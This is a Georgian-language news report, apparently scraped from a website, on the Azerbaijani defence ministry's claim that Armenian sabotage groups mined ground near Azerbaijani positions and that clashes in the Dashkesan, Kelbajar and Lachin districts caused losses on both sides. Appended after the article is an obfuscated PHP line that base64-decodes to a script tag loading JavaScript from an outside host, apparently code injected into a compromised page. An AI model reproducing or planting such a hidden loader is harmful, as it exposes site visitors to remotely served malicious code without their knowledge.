celsiusi
ავერსი საქკაბელი
სომხეთის შეიარაღებული ძალების დივერსიული ჯგუფები ღამით აზერბაიჯანის არმიის პოზიციებსა და მომარაგების გზებს შორის ტერიტორიების დანაღმვას ახორციელებდნენ, – ამის შესახებ აზერბაიჯანული მედია აზერბაიჯანის თავდაცვის უწყებაზე დაყრდნობით წერს. 
 
მედიის მიერ გავრცელებული ინფორმაციის თანახმად, მსხვერპლია არის ორივე მხარეს.
 
„ამ ქმედებების აღსაკვეთად, ჩვენი ქვედანაყოფების მიერ განხორციელებული გადაუდებელი ზომების შედეგად, მოხდა საბრძოლო შეტაკება. დაშქესანის, ქელბაჯარისა და ლაჩინის რაიონების ტერიტორიაზე აზერბაიჯანის არმიის ზოგიერთი პოზიცია, თავშესაფარი და საყრდენი პუნქტი სომხეთის შეიარაღებული ძალების ქვედანაყოფების ინტენსიური ცეცხლის ქვეშ მოყვა, მათ შორის ნაღმმტყორცნებიდან. ამის შედეგად, არის პირადი შემადგენლობის დანაკარგი და დაზიანებულია სამხედრო ინფრასტრუქტურა“, – ნათქვამია აზერბაიჯანის თავდაცვის სამინისტროს განცხადებაში.
 
უწყების ცნობით, ამჟამად აზერბაიჯანელი სამხედროები საპასუხო ზომებს ახორციელებენ სომხეთის შეიარაღებული ძალების საცეცხლე წერტილების ჩასახშობად და საბრძოლო შეტაკების მასშტაბების გაფართოების თავიდან ასაცილებლად.
 
აზერბაიჯანი სომხეთს ბოლო ერთი თვის განმავლობაში ლაჩინის, ქედბექის, დაშქესანისა და ქელბაჯარის რაიონებში სისტემატურ პროვოკაციებში სდებს ბრალს, რაც ბაქოს მტკიცებით, მეტყველებს, რომ „სომხეთი ფართომასშტაბიანი სამხედრო პროვოკაციისთვის ემზადება“.
 
415
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");